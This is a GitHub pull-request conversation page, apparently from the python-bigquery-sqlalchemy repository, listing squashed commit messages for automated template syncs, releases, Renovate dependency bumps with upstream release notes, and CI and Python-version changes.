Conversation
…le (#348) Source-Link: googleapis/synthtool@a7ed11e Post-Processor: gcr.io/cloud-devrel-public-resources/owlbot-python:latest@sha256:6e7328583be8edd3ba8f35311c76a1ecbc823010279ccb6ab46b7a76e25eafcc Co-authored-by: Owl Bot <gcf-owl-bot[bot]@users.noreply.github.com>
Co-authored-by: Anthonios Partheniou <partheniou@google.com>
* chore(python): omit google/__init__.py in coverage Source-Link: googleapis/synthtool@694118b Post-Processor: gcr.io/cloud-devrel-public-resources/owlbot-python:latest@sha256:ec49167c606648a063d1222220b48119c912562849a0528f35bfb592a9f72737 * fix replacement in owlbot.py * 🦉 Updates from OwlBot See https://github.com/googleapis/repo-automation-bots/blob/main/packages/owl-bot/README.md * 🦉 Updates from OwlBot See https://github.com/googleapis/repo-automation-bots/blob/main/packages/owl-bot/README.md Co-authored-by: Owl Bot <gcf-owl-bot[bot]@users.noreply.github.com> Co-authored-by: Anthonios Partheniou <partheniou@google.com>
Also, include materialized views in 'get_view_names'. Closes #332.
Co-authored-by: release-please[bot] <55107282+release-please[bot]@users.noreply.github.com>
[](https://renovatebot.com) This PR contains the following updates: | Package | Change | Age | Adoption | Passing | Confidence | |---|---|---|---|---|---| | [PyYAML](https://pyyaml.org/) ([source](https://togithub.com/yaml/pyyaml)) | `==5.4.1` -> `==6.0` | [](https://docs.renovatebot.com/merge-confidence/) | [](https://docs.renovatebot.com/merge-confidence/) | [](https://docs.renovatebot.com/merge-confidence/) | [](https://docs.renovatebot.com/merge-confidence/) | | [SQLAlchemy](https://www.sqlalchemy.org) ([changelog](https://docs.sqlalchemy.org/en/latest/changelog/)) | `==1.4.25` -> `==1.4.26` | [](https://docs.renovatebot.com/merge-confidence/) | [](https://docs.renovatebot.com/merge-confidence/) | [](https://docs.renovatebot.com/merge-confidence/) | [](https://docs.renovatebot.com/merge-confidence/) | | [Shapely](https://togithub.com/Toblerity/Shapely) | `==1.7.1` -> `==1.8.0` | [](https://docs.renovatebot.com/merge-confidence/) | [](https://docs.renovatebot.com/merge-confidence/) | [](https://docs.renovatebot.com/merge-confidence/) | [](https://docs.renovatebot.com/merge-confidence/) | | [cffi](http://cffi.readthedocs.org) | `==1.14.6` -> `==1.15.0` | [](https://docs.renovatebot.com/merge-confidence/) | [](https://docs.renovatebot.com/merge-confidence/) | [](https://docs.renovatebot.com/merge-confidence/) | [](https://docs.renovatebot.com/merge-confidence/) | | [google-api-core](https://togithub.com/googleapis/python-api-core) | `==2.1.0` -> `==2.1.1` | [](https://docs.renovatebot.com/merge-confidence/) | [](https://docs.renovatebot.com/merge-confidence/) | [](https://docs.renovatebot.com/merge-confidence/) | [](https://docs.renovatebot.com/merge-confidence/) | | [google-auth](https://togithub.com/googleapis/google-auth-library-python) | `==2.3.0` -> `==2.3.1` | [](https://docs.renovatebot.com/merge-confidence/) | [](https://docs.renovatebot.com/merge-confidence/) | [](https://docs.renovatebot.com/merge-confidence/) | [](https://docs.renovatebot.com/merge-confidence/) | | [google-cloud-testutils](https://togithub.com/googleapis/python-test-utils) | `==1.1.0` -> `==1.2.0` | [](https://docs.renovatebot.com/merge-confidence/) | [](https://docs.renovatebot.com/merge-confidence/) | [](https://docs.renovatebot.com/merge-confidence/) | [](https://docs.renovatebot.com/merge-confidence/) | | [google-resumable-media](https://togithub.com/googleapis/google-resumable-media-python) | `==2.0.3` -> `==2.1.0` | [](https://docs.renovatebot.com/merge-confidence/) | [](https://docs.renovatebot.com/merge-confidence/) | [](https://docs.renovatebot.com/merge-confidence/) | [](https://docs.renovatebot.com/merge-confidence/) | | [grpcio](https://grpc.io) | `==1.41.0` -> `==1.41.1` | [](https://docs.renovatebot.com/merge-confidence/) | [](https://docs.renovatebot.com/merge-confidence/) | [](https://docs.renovatebot.com/merge-confidence/) | [](https://docs.renovatebot.com/merge-confidence/) | | [opentelemetry-api](https://togithub.com/open-telemetry/opentelemetry-python) | `==1.5.0` -> `==1.6.2` | [](https://docs.renovatebot.com/merge-confidence/) | [](https://docs.renovatebot.com/merge-confidence/) | [](https://docs.renovatebot.com/merge-confidence/) | [](https://docs.renovatebot.com/merge-confidence/) | | [opentelemetry-sdk](https://togithub.com/open-telemetry/opentelemetry-python) | `==1.5.0` -> `==1.6.2` | [](https://docs.renovatebot.com/merge-confidence/) | [](https://docs.renovatebot.com/merge-confidence/) | [](https://docs.renovatebot.com/merge-confidence/) | [](https://docs.renovatebot.com/merge-confidence/) | | [proto-plus](https://togithub.com/googleapis/proto-plus-python) | `==1.19.5` -> `==1.19.6` | [](https://docs.renovatebot.com/merge-confidence/) | [](https://docs.renovatebot.com/merge-confidence/) | [](https://docs.renovatebot.com/merge-confidence/) | [](https://docs.renovatebot.com/merge-confidence/) | | [protobuf](https://developers.google.com/protocol-buffers/) | `==3.18.1` -> `==3.19.0` | [](https://docs.renovatebot.com/merge-confidence/) | [](https://docs.renovatebot.com/merge-confidence/) | [](https://docs.renovatebot.com/merge-confidence/) | [](https://docs.renovatebot.com/merge-confidence/) | | [pyparsing](https://togithub.com/pyparsing/pyparsing) | `==2.4.7` -> `==3.0.1` | [](https://docs.renovatebot.com/merge-confidence/) | [](https://docs.renovatebot.com/merge-confidence/) | [](https://docs.renovatebot.com/merge-confidence/) | [](https://docs.renovatebot.com/merge-confidence/) | --- ### Release Notes <details> <summary>yaml/pyyaml</summary> ### [`v6.0`](https://togithub.com/yaml/pyyaml/compare/5.4.1...6.0) [Compare Source](https://togithub.com/yaml/pyyaml/compare/5.4.1...6.0) </details> <details> <summary>Toblerity/Shapely</summary> ### [`v1.8.0`](https://togithub.com/Toblerity/Shapely/blob/master/CHANGES.txt#​180-2021-10-25) [Compare Source](https://togithub.com/Toblerity/Shapely/compare/1.7.1...1.8.0) This is the final 1.8.0 release. There have been no changes since 1.8rc2. </details> <details> <summary>googleapis/python-api-core</summary> ### [`v2.1.1`](https://togithub.com/googleapis/python-api-core/blob/master/CHANGELOG.md#​211-httpswwwgithubcomgoogleapispython-api-corecomparev210v211-2021-10-13) [Compare Source](https://togithub.com/googleapis/python-api-core/compare/v2.1.0...v2.1.1) </details> <details> <summary>googleapis/google-auth-library-python</summary> ### [`v2.3.1`](https://togithub.com/googleapis/google-auth-library-python/blob/master/CHANGELOG.md#​231-httpswwwgithubcomgoogleapisgoogle-auth-library-pythoncomparev230v231-2021-10-21) [Compare Source](https://togithub.com/googleapis/google-auth-library-python/compare/v2.3.0...v2.3.1) </details> <details> <summary>googleapis/python-test-utils</summary> ### [`v1.2.0`](https://togithub.com/googleapis/python-test-utils/blob/master/CHANGELOG.md#​120-httpswwwgithubcomgoogleapispython-test-utilscomparev110v120-2021-10-18) [Compare Source](https://togithub.com/googleapis/python-test-utils/compare/v1.1.0...v1.2.0) ##### Features - add support for python 3.10 ([#​68](https://www.togithub.com/googleapis/python-test-utils/issues/68)) ([d93b6a1](https://www.github.com/googleapis/python-test-utils/commit/d93b6a11e3bfade2b29ab90ed3bc2c384beb01cd)) </details> <details> <summary>googleapis/google-resumable-media-python</summary> ### [`v2.1.0`](https://togithub.com/googleapis/google-resumable-media-python/blob/master/CHANGELOG.md#​210-httpswwwgithubcomgoogleapisgoogle-resumable-media-pythoncomparev203v210-2021-10-20) [Compare Source](https://togithub.com/googleapis/google-resumable-media-python/compare/v2.0.3...v2.1.0) ##### Features - add support for Python 3.10 ([#​279](https://www.togithub.com/googleapis/google-resumable-media-python/issues/279)) ([4dbd14a](https://www.github.com/googleapis/google-resumable-media-python/commit/4dbd14aed14b87d4d288584a59e8ea11beccaf97)) ##### Bug Fixes - Include ConnectionError and urllib3 exception as retriable ([#​282](https://www.togithub.com/googleapis/google-resumable-media-python/issues/282)) ([d33465f](https://www.github.com/googleapis/google-resumable-media-python/commit/d33465fc047f4188dd967871ea93255aefd4ac2e)) ##### [2.0.3](https://www.github.com/googleapis/google-resumable-media-python/compare/v2.0.2...v2.0.3) (2021-09-20) ##### Bug Fixes - add REQUEST_TIMEOUT 408 as retryable code ([#​270](https://www.togithub.com/googleapis/google-resumable-media-python/issues/270)) ([d0ad0aa](https://www.github.com/googleapis/google-resumable-media-python/commit/d0ad0aade5f4e7c8efed4f4339fc31fb3304fd3c)) - un-pin google-crc32c ([#​267](https://www.togithub.com/googleapis/google-resumable-media-python/issues/267)) ([6b03a13](https://www.github.com/googleapis/google-resumable-media-python/commit/6b03a13717e1d4d18186bdf2146d5b452d9e3237)) ##### [2.0.2](https://www.github.com/googleapis/google-resumable-media-python/compare/v2.0.1...v2.0.2) (2021-09-02) ##### Bug Fixes - temporarily pin google-crc32c to 1.1.2 to mitigate upstream issue affecting OS X Big Sur ([#​264](https://www.togithub.com/googleapis/google-resumable-media-python/issues/264)) ([9fa344f](https://www.github.com/googleapis/google-resumable-media-python/commit/9fa344f42a99db1af27b8ca126a2ea6b3c01d837)) ##### [2.0.1](https://www.github.com/googleapis/google-resumable-media-python/compare/v2.0.0...v2.0.1) (2021-08-30) ##### Bug Fixes - check if retry is allowed after retry wait calculation ([#​258](https://www.togithub.com/googleapis/google-resumable-media-python/issues/258)) ([00ccf71](https://www.github.com/googleapis/google-resumable-media-python/commit/00ccf7120251d3899c8d0c2eccdf3b177b5b3742)) - do not mark upload download instances invalid with retriable error codes ([#​261](https://www.togithub.com/googleapis/google-resumable-media-python/issues/261)) ([a1c5f7d](https://www.github.com/googleapis/google-resumable-media-python/commit/a1c5f7d0e3ce48d8d6eb8aced31707a881f7ee96)) </details> <details> <summary>open-telemetry/opentelemetry-python</summary> ### [`v1.6.2`](https://togithub.com/open-telemetry/opentelemetry-python/blob/master/CHANGELOG.md#​162-025b2-httpsgithubcomopen-telemetryopentelemetry-pythonreleasestagv162-025b2---2021-10-19) [Compare Source](https://togithub.com/open-telemetry/opentelemetry-python/compare/v1.6.1...v1.6.2) ### [`v1.6.1`](https://togithub.com/open-telemetry/opentelemetry-python/blob/master/CHANGELOG.md#​161-025b1-httpsgithubcomopen-telemetryopentelemetry-pythonreleasestagv161-025b1---2021-10-18) [Compare Source](https://togithub.com/open-telemetry/opentelemetry-python/compare/v1.6.0...v1.6.1) - Fix ReadableSpan property types attempting to create a mapping from a list ([#​2215](https://togithub.com/open-telemetry/opentelemetry-python/pull/2215)) - Upgrade GRPC/protobuf related dependency and regenerate otlp protobufs ([#​2201](https://togithub.com/open-telemetry/opentelemetry-python/pull/2201)) - Propagation: only warn about oversized baggage headers when headers exist ([#​2212](https://togithub.com/open-telemetry/opentelemetry-python/pull/2212)) - Fix parental trace relationship for opentracing `follows_from` reference ([#​2180](https://togithub.com/open-telemetry/opentelemetry-python/pull/2180)) ### [`v1.6.0`](https://togithub.com/open-telemetry/opentelemetry-python/blob/master/CHANGELOG.md#​160-025b0-httpsgithubcomopen-telemetryopentelemetry-pythonreleasestagv160-025b0---2021-10-13) [Compare Source](https://togithub.com/open-telemetry/opentelemetry-python/compare/v1.5.0...v1.6.0) - Fix race in `set_tracer_provider()` ([#​2182](https://togithub.com/open-telemetry/opentelemetry-python/pull/2182)) - Automatically load OTEL environment variables as options for `opentelemetry-instrument` ([#​1969](https://togithub.com/open-telemetry/opentelemetry-python/pull/1969)) - `opentelemetry-semantic-conventions` Update to semantic conventions v1.6.1 ([#​2077](https://togithub.com/open-telemetry/opentelemetry-python/pull/2077)) - Do not count invalid attributes for dropped ([#​2096](https://togithub.com/open-telemetry/opentelemetry-python/pull/2096)) - Fix propagation bug caused by counting skipped entries ([#​2071](https://togithub.com/open-telemetry/opentelemetry-python/pull/2071)) - Add entry point for exporters with default protocol ([#​2093](https://togithub.com/open-telemetry/opentelemetry-python/pull/2093)) - Renamed entrypoints `otlp_proto_http_span`, `otlp_proto_grpc_span`, `console_span` to remove redundant `_span` suffix. ([#​2093](https://togithub.com/open-telemetry/opentelemetry-python/pull/2093)) - Do not skip sequence attribute on decode error ([#​2097](https://togithub.com/open-telemetry/opentelemetry-python/pull/2097)) - `opentelemetry-test`: Add `HttpTestBase` to allow tests with actual TCP sockets ([#​2101](https://togithub.com/open-telemetry/opentelemetry-python/pull/2101)) - Fix incorrect headers parsing via environment variables ([#​2103](https://togithub.com/open-telemetry/opentelemetry-python/pull/2103)) - Add support for OTEL_ATTRIBUTE_COUNT_LIMIT ([#​2139](https://togithub.com/open-telemetry/opentelemetry-python/pull/2139)) - Attribute limits no longer apply to Resource attributes ([#​2138](https://togithub.com/open-telemetry/opentelemetry-python/pull/2138)) - `opentelemetry-exporter-otlp`: Add `opentelemetry-otlp-proto-http` as dependency ([#​2147](https://togithub.com/open-telemetry/opentelemetry-python/pull/2147)) - Fix validity calculation for trace and span IDs ([#​2145](https://togithub.com/open-telemetry/opentelemetry-python/pull/2145)) - Add `schema_url` to `TracerProvider.get_tracer` ([#​2154](https://togithub.com/open-telemetry/opentelemetry-python/pull/2154)) - Make baggage implementation w3c spec complaint ([#​2167](https://togithub.com/open-telemetry/opentelemetry-python/pull/2167)) - Add name to `BatchSpanProcessor` worker thread ([#​2186](https://togithub.com/open-telemetry/opentelemetry-python/pull/2186)) </details> <details> <summary>googleapis/proto-plus-python</summary> ### [`v1.19.6`](https://togithub.com/googleapis/proto-plus-python/blob/master/CHANGELOG.md#​1196-httpswwwgithubcomgoogleapisproto-plus-pythoncomparev1195v1196-2021-10-25) [Compare Source](https://togithub.com/googleapis/proto-plus-python/compare/v1.19.5...v1.19.6) </details> <details> <summary>pyparsing/pyparsing</summary> ### [`v3.0.1`](https://togithub.com/pyparsing/pyparsing/blob/master/CHANGES#Version-301--) - Fixed bug where Word(max=n) did not match word groups less than length 'n'. Thanks to Joachim Metz for catching this! - Fixed bug where ParseResults accidentally created recursive contents. Joachim Metz on this one also! - Fixed bug where warn_on_multiple_string_args_to_oneof warning is raised even when not enabled. ### [`v3.0.0`](https://togithub.com/pyparsing/pyparsing/blob/master/CHANGES#Version-300--) - A consolidated list of all the changes in the 3.0.0 release can be found in docs/whats_new_in\_3\_0\_0.rst. (https://github.com/pyparsing/pyparsing/blob/master/docs/whats_new_in\_3\_0\_0.rst) </details> --- ### Configuration 📅 **Schedule**: At any time (no schedule defined). 🚦 **Automerge**: Disabled by config. Please merge this manually once you are satisfied. ♻ **Rebasing**: Renovate will not automatically rebase this PR, because other commits have been found. 👻 **Immortal**: This PR will be recreated if closed unmerged. Get [config help](https://togithub.com/renovatebot/renovate/discussions) if that's undesired. --- - [ ] <!-- rebase-check -->If you want to rebase/retry this PR, click this checkbox. --- This PR has been generated by [WhiteSource Renovate](https://renovate.whitesourcesoftware.com). View repository job log [here](https://app.renovatebot.com/dashboard#github/googleapis/python-bigquery-sqlalchemy).
[](https://renovatebot.com) This PR contains the following updates: | Package | Change | Age | Adoption | Passing | Confidence | |---|---|---|---|---|---| | [google-api-core](https://togithub.com/googleapis/python-api-core) | `==2.1.1` -> `==2.2.0` | [](https://docs.renovatebot.com/merge-confidence/) | [](https://docs.renovatebot.com/merge-confidence/) | [](https://docs.renovatebot.com/merge-confidence/) | [](https://docs.renovatebot.com/merge-confidence/) | | [google-auth](https://togithub.com/googleapis/google-auth-library-python) | `==2.3.1` -> `==2.3.2` | [](https://docs.renovatebot.com/merge-confidence/) | [](https://docs.renovatebot.com/merge-confidence/) | [](https://docs.renovatebot.com/merge-confidence/) | [](https://docs.renovatebot.com/merge-confidence/) | | [proto-plus](https://togithub.com/googleapis/proto-plus-python) | `==1.19.6` -> `==1.19.7` | [](https://docs.renovatebot.com/merge-confidence/) | [](https://docs.renovatebot.com/merge-confidence/) | [](https://docs.renovatebot.com/merge-confidence/) | [](https://docs.renovatebot.com/merge-confidence/) | | [pyarrow](https://arrow.apache.org/) | `==5.0.0` -> `==6.0.0` | [](https://docs.renovatebot.com/merge-confidence/) | [](https://docs.renovatebot.com/merge-confidence/) | [](https://docs.renovatebot.com/merge-confidence/) | [](https://docs.renovatebot.com/merge-confidence/) | | [pyparsing](https://togithub.com/pyparsing/pyparsing) | `==3.0.1` -> `==3.0.2` | [](https://docs.renovatebot.com/merge-confidence/) | [](https://docs.renovatebot.com/merge-confidence/) | [](https://docs.renovatebot.com/merge-confidence/) | [](https://docs.renovatebot.com/merge-confidence/) | | [sqlalchemy-bigquery](https://togithub.com/googleapis/python-bigquery-sqlalchemy) | `==1.2.0` -> `==1.2.1` | [](https://docs.renovatebot.com/merge-confidence/) | [](https://docs.renovatebot.com/merge-confidence/) | [](https://docs.renovatebot.com/merge-confidence/) | [](https://docs.renovatebot.com/merge-confidence/) | --- ### Release Notes <details> <summary>googleapis/python-api-core</summary> ### [`v2.2.0`](https://togithub.com/googleapis/python-api-core/blob/master/CHANGELOG.md#​220-httpswwwgithubcomgoogleapispython-api-corecomparev211v220-2021-10-25) [Compare Source](https://togithub.com/googleapis/python-api-core/compare/v2.1.1...v2.2.0) ##### Features - add 'GoogleAPICallError.error_details' property ([#​286](https://www.togithub.com/googleapis/python-api-core/issues/286)) ([ef6f0fc](https://www.github.com/googleapis/python-api-core/commit/ef6f0fcfdfe771172056e35e3c990998b3b00416)) ##### [2.1.1](https://www.github.com/googleapis/python-api-core/compare/v2.1.0...v2.1.1) (2021-10-13) ##### Bug Fixes - add mypy checking + 'py.typed' file ([#​290](https://www.togithub.com/googleapis/python-api-core/issues/290)) ([0023ee1](https://www.github.com/googleapis/python-api-core/commit/0023ee1fe0e8b80c7a9e8987e0f322a829e5d613)) </details> <details> <summary>googleapis/google-auth-library-python</summary> ### [`v2.3.2`](https://togithub.com/googleapis/google-auth-library-python/blob/master/CHANGELOG.md#​232-httpswwwgithubcomgoogleapisgoogle-auth-library-pythoncomparev231v232-2021-10-26) [Compare Source](https://togithub.com/googleapis/google-auth-library-python/compare/v2.3.1...v2.3.2) </details> <details> <summary>googleapis/proto-plus-python</summary> ### [`v1.19.7`](https://togithub.com/googleapis/proto-plus-python/blob/master/CHANGELOG.md#​1197-httpswwwgithubcomgoogleapisproto-plus-pythoncomparev1196v1197-2021-10-27) [Compare Source](https://togithub.com/googleapis/proto-plus-python/compare/v1.19.6...v1.19.7) </details> <details> <summary>pyparsing/pyparsing</summary> ### [`v3.0.2`](https://togithub.com/pyparsing/pyparsing/blob/master/CHANGES#Version-302--) - Reverted change in behavior with `LineStart` and `StringStart`, which changed the interpretation of when and how `LineStart` and `StringStart` should match when a line starts with spaces. In 3.0.0, the `xxxStart` expressions were not really treated like expressions in their own right, but as modifiers to the following expression when used like `LineStart() + expr`, so that if there were whitespace on the line before `expr` (which would match in versions prior to 3.0.0), the match would fail. 3.0.0 implemented this by automatically promoting `LineStart() + expr` to `AtLineStart(expr)`, which broke existing parsers that did not expect `expr` to necessarily be right at the start of the line, but only be the first token found on the line. This was reported as a regression in Issue [#​317](https://togithub.com/pyparsing/pyparsing/issues/317). In 3.0.2, pyparsing reverts to the previous behavior, but will retain the new `AtLineStart` and `AtStringStart` expression classes, so that parsers can chose whichever behavior applies in their specific instance. Specifically: ### matches expr if it is the first token on the line ### (allows for leading whitespace) LineStart() + expr ### matches only if expr is found in column 1 AtLineStart(expr) - Performance enhancement to `one_of` to always generate an internal `Regex`, even if `caseless` or `as_keyword` args are given as `True` (unless explicitly disabled by passing `use_regex=False`). - `IndentedBlock` class now works with `recursive` flag. By default, the results parsed by an `IndentedBlock` are grouped. This can be disabled by constructing the `IndentedBlock` with `grouped=False`. </details> <details> <summary>googleapis/python-bigquery-sqlalchemy</summary> ### [`v1.2.1`](https://togithub.com/googleapis/python-bigquery-sqlalchemy/blob/master/CHANGELOG.md#​121-httpswwwgithubcomgoogleapispython-bigquery-sqlalchemycomparev120v121-2021-10-27) [Compare Source](https://togithub.com/googleapis/python-bigquery-sqlalchemy/compare/v1.2.0...v1.2.1) </details> --- ### Configuration 📅 **Schedule**: At any time (no schedule defined). 🚦 **Automerge**: Disabled by config. Please merge this manually once you are satisfied. ♻ **Rebasing**: Whenever PR becomes conflicted, or you tick the rebase/retry checkbox. 👻 **Immortal**: This PR will be recreated if closed unmerged. Get [config help](https://togithub.com/renovatebot/renovate/discussions) if that's undesired. --- - [ ] <!-- rebase-check -->If you want to rebase/retry this PR, click this checkbox. --- This PR has been generated by [WhiteSource Renovate](https://renovate.whitesourcesoftware.com). View repository job log [here](https://app.renovatebot.com/dashboard#github/googleapis/python-bigquery-sqlalchemy).
Co-authored-by: release-please[bot] <55107282+release-please[bot]@users.noreply.github.com>
* test: failing alembic test compares structured objects instead of strings * 🦉 Updates from OwlBot See https://github.com/googleapis/repo-automation-bots/blob/main/packages/owl-bot/README.md * temporarily cap max sqlalchemy while we debug failing compliance tests * document pin Co-authored-by: Owl Bot <gcf-owl-bot[bot]@users.noreply.github.com>
requirements{,-test}.txt are clean up to remove things that are not
needed for tests to pass and to include newer versions of dependencies.
Co-authored-by: Tim Swast <swast@google.com>
* chore: update .repo-metadata.json * revert * remove api_shortname * 🦉 Updates from OwlBot See https://github.com/googleapis/repo-automation-bots/blob/main/packages/owl-bot/README.md Co-authored-by: Tim Swast <swast@google.com> Co-authored-by: Owl Bot <gcf-owl-bot[bot]@users.noreply.github.com>
Co-authored-by: release-please[bot] <55107282+release-please[bot]@users.noreply.github.com>
* chore(deps): update all dependencies * remove transitive deps * more transitive deps * more transitive deps * more transitive deps * lock sqlalchemy version for now * reset sqlalchemy version Co-authored-by: Tim Swast <swast@google.com>
Source-Link: googleapis/synthtool@52aef91 Post-Processor: gcr.io/cloud-devrel-public-resources/owlbot-python:latest@sha256:36a95b8f494e4674dc9eee9af98961293b51b86b3649942aac800ae6c1f796d4 Co-authored-by: Owl Bot <gcf-owl-bot[bot]@users.noreply.github.com>
Source-Link: googleapis/synthtool@69fda12 Post-Processor: gcr.io/cloud-devrel-public-resources/owlbot-python:latest@sha256:ae600f36b6bc972b368367b6f83a1d91ec2c82a4a116b383d67d547c56fe6de3 Co-authored-by: Owl Bot <gcf-owl-bot[bot]@users.noreply.github.com>
* chore(deps): update all dependencies * deps: try sqlalchemy 1.4.28 * try 1.4.27 * 🦉 Updates from OwlBot See https://github.com/googleapis/repo-automation-bots/blob/main/packages/owl-bot/README.md * try 1.4.26 * 🦉 Updates from OwlBot See https://github.com/googleapis/repo-automation-bots/blob/main/packages/owl-bot/README.md * 🦉 Updates from OwlBot See https://github.com/googleapis/repo-automation-bots/blob/main/packages/owl-bot/README.md Co-authored-by: Anthonios Partheniou <partheniou@google.com> Co-authored-by: Tim Swast <swast@google.com> Co-authored-by: Owl Bot <gcf-owl-bot[bot]@users.noreply.github.com>
[](https://renovatebot.com) This PR contains the following updates: | Package | Change | Age | Adoption | Passing | Confidence | |---|---|---|---|---|---| | [geoalchemy2](https://geoalchemy-2.readthedocs.io/en/latest/) | `==0.10.1` -> `==0.10.2` | [](https://docs.renovatebot.com/merge-confidence/) | [](https://docs.renovatebot.com/merge-confidence/) | [](https://docs.renovatebot.com/merge-confidence/) | [](https://docs.renovatebot.com/merge-confidence/) | | [google-api-core](https://togithub.com/googleapis/python-api-core) | `==2.3.2` -> `==2.4.0` | [](https://docs.renovatebot.com/merge-confidence/) | [](https://docs.renovatebot.com/merge-confidence/) | [](https://docs.renovatebot.com/merge-confidence/) | [](https://docs.renovatebot.com/merge-confidence/) | | [google-cloud-bigquery](https://togithub.com/googleapis/python-bigquery) | `==2.31.0` -> `==2.32.0` | [](https://docs.renovatebot.com/merge-confidence/) | [](https://docs.renovatebot.com/merge-confidence/) | [](https://docs.renovatebot.com/merge-confidence/) | [](https://docs.renovatebot.com/merge-confidence/) | | [protobuf](https://developers.google.com/protocol-buffers/) | `==3.19.1` -> `==3.19.3` | [](https://docs.renovatebot.com/merge-confidence/) | [](https://docs.renovatebot.com/merge-confidence/) | [](https://docs.renovatebot.com/merge-confidence/) | [](https://docs.renovatebot.com/merge-confidence/) | | [sqlalchemy](https://www.sqlalchemy.org) ([changelog](https://docs.sqlalchemy.org/en/latest/changelog/)) | `>=1.2.0,<=1.4.26` -> `>=1.2.0,<=1.4.29` | [](https://docs.renovatebot.com/merge-confidence/) | [](https://docs.renovatebot.com/merge-confidence/) | [](https://docs.renovatebot.com/merge-confidence/) | [](https://docs.renovatebot.com/merge-confidence/) | | [sqlalchemy](https://www.sqlalchemy.org) ([changelog](https://docs.sqlalchemy.org/en/latest/changelog/)) | `==1.4.26` -> `==1.4.29` | [](https://docs.renovatebot.com/merge-confidence/) | [](https://docs.renovatebot.com/merge-confidence/) | [](https://docs.renovatebot.com/merge-confidence/) | [](https://docs.renovatebot.com/merge-confidence/) | | [urllib3](https://urllib3.readthedocs.io/) ([source](https://togithub.com/urllib3/urllib3)) | `==1.26.7` -> `==1.26.8` | [](https://docs.renovatebot.com/merge-confidence/) | [](https://docs.renovatebot.com/merge-confidence/) | [](https://docs.renovatebot.com/merge-confidence/) | [](https://docs.renovatebot.com/merge-confidence/) | --- ### Release Notes <details> <summary>googleapis/python-api-core</summary> ### [`v2.4.0`](https://togithub.com/googleapis/python-api-core/blob/HEAD/CHANGELOG.md#​240-httpswwwgithubcomgoogleapispython-api-corecomparev232v240-2022-01-11) [Compare Source](https://togithub.com/googleapis/python-api-core/compare/v2.3.2...v2.4.0) ##### Features - add support for 'error_info' ([#​315](https://www.togithub.com/googleapis/python-api-core/issues/315)) ([cc46aa6](https://www.github.com/googleapis/python-api-core/commit/cc46aa68ec184871330d16a6c767f57a4f0eb633)) - iterator for processing JSON responses in REST streaming. ([#​317](https://www.togithub.com/googleapis/python-api-core/issues/317)) ([f9f2696](https://www.github.com/googleapis/python-api-core/commit/f9f26969842b456ea372bed941d712b7a9ab7239)) </details> <details> <summary>googleapis/python-bigquery</summary> ### [`v2.32.0`](https://togithub.com/googleapis/python-bigquery/blob/HEAD/CHANGELOG.md#​2320-httpsgithubcomgoogleapispython-bigquerycomparev2310v2320-2022-01-12) [Compare Source](https://togithub.com/googleapis/python-bigquery/compare/v2.31.0...v2.32.0) ##### Features - support authorized dataset entity ([#​1075](https://togithub.com/googleapis/python-bigquery/issues/1075)) ([c098cd0](https://togithub.com/googleapis/python-bigquery/commit/c098cd01c755633bfaba7193dd5c044a489a5b61)) ##### Bug Fixes - remove query text from exception message, use `exception.debug_message` instead ([#​1105](https://togithub.com/googleapis/python-bigquery/issues/1105)) ([e23114c](https://togithub.com/googleapis/python-bigquery/commit/e23114ce362e09ac72f733a640e53a561cc9ce69)) </details> <details> <summary>urllib3/urllib3</summary> ### [`v1.26.8`](https://togithub.com/urllib3/urllib3/releases/1.26.8) [Compare Source](https://togithub.com/urllib3/urllib3/compare/1.26.7...1.26.8) **If you or your organization rely on urllib3 consider supporting us via [GitHub Sponsors](https://togithub.com/sponsors/urllib3).**⚠️ **urllib3 v2.0 will drop support for Python 2**: [Read more in the v2.0 Roadmap](https://urllib3.readthedocs.io/en/latest/v2-roadmap.html) :warning: **This release will be the last release supporting Python 3.5. Please upgrade to a non-EOL Python version.** - Added extra message to`urllib3.exceptions.ProxyError` when urllib3 detects that a proxy is configured to use HTTPS but the proxy itself appears to only use HTTP. - Added a mention of the size of the connection pool when discarding a connection due to the pool being full. - Added explicit support for Python 3.11. - Deprecated the `Retry.MAX_BACKOFF` class property in favor of `Retry.DEFAULT_MAX_BACKOFF` to better match the rest of the default parameter names. `Retry.MAX_BACKOFF` is removed in v2.0. - Changed location of the vendored `ssl.match_hostname` function from `urllib3.packages.ssl_match_hostname` to `urllib3.util.ssl_match_hostname` to ensure Python 3.10+ compatibility after being repackaged by downstream distributors. - Fixed absolute imports, all imports are now relative. </details> --- ### Configuration 📅 **Schedule**: At any time (no schedule defined). 🚦 **Automerge**: Disabled by config. Please merge this manually once you are satisfied. ♻ **Rebasing**: Whenever PR becomes conflicted, or you tick the rebase/retry checkbox. 👻 **Immortal**: This PR will be recreated if closed unmerged. Get [config help](https://togithub.com/renovatebot/renovate/discussions) if that's undesired. --- - [ ] <!-- rebase-check -->If you want to rebase/retry this PR, click this checkbox. --- This PR has been generated by [WhiteSource Renovate](https://renovate.whitesourcesoftware.com). View repository job log [here](https://app.renovatebot.com/dashboard#github/googleapis/python-bigquery-sqlalchemy).
Source-Link: googleapis/synthtool@4760d8d Post-Processor: gcr.io/cloud-devrel-public-resources/owlbot-python:latest@sha256:f0e4b51deef56bed74d3e2359c583fc104a8d6367da3984fc5c66938db738828 Co-authored-by: Owl Bot <gcf-owl-bot[bot]@users.noreply.github.com>
* ci(python): run lint / unit tests / docs as GH actions Source-Link: googleapis/synthtool@57be0cd Post-Processor: gcr.io/cloud-devrel-public-resources/owlbot-python:latest@sha256:ed1f9983d5a935a89fe8085e8bb97d94e41015252c5b6c9771257cf8624367e6 * add commit to trigger gh actions * exclude templated github actions Co-authored-by: Owl Bot <gcf-owl-bot[bot]@users.noreply.github.com> Co-authored-by: Anthonios Partheniou <partheniou@google.com>
* chore: add custom sync repo settings * add required checks for samples * Update .github/sync-repo-settings.yaml Co-authored-by: Tim Swast <swast@google.com>
Co-authored-by: release-please[bot] <55107282+release-please[bot]@users.noreply.github.com>
* feat: remove python 3.8 support * adds debugging to noxfile and tweaks to correct coverage * updates lowest version for system test and owlbot * updates DEFAULT_PYTHON_VERSION to 3.10 * 🦉 Updates from OwlBot post-processor See https://github.com/googleapis/repo-automation-bots/blob/main/packages/owl-bot/README.md * updates extras in several sessions & lists additional Python ver. * Revert "adds debugging to noxfile and tweaks to correct coverage" This reverts commit 4e86c0446c30d4e88e644d04f7a7c30581f2e47d. * adds back in code that was removed * adds pragma to avoid cover fallure. --------- Co-authored-by: google-labs-jules[bot] <161369871+google-labs-jules[bot]@users.noreply.github.com> Co-authored-by: Owl Bot <gcf-owl-bot[bot]@users.noreply.github.com>
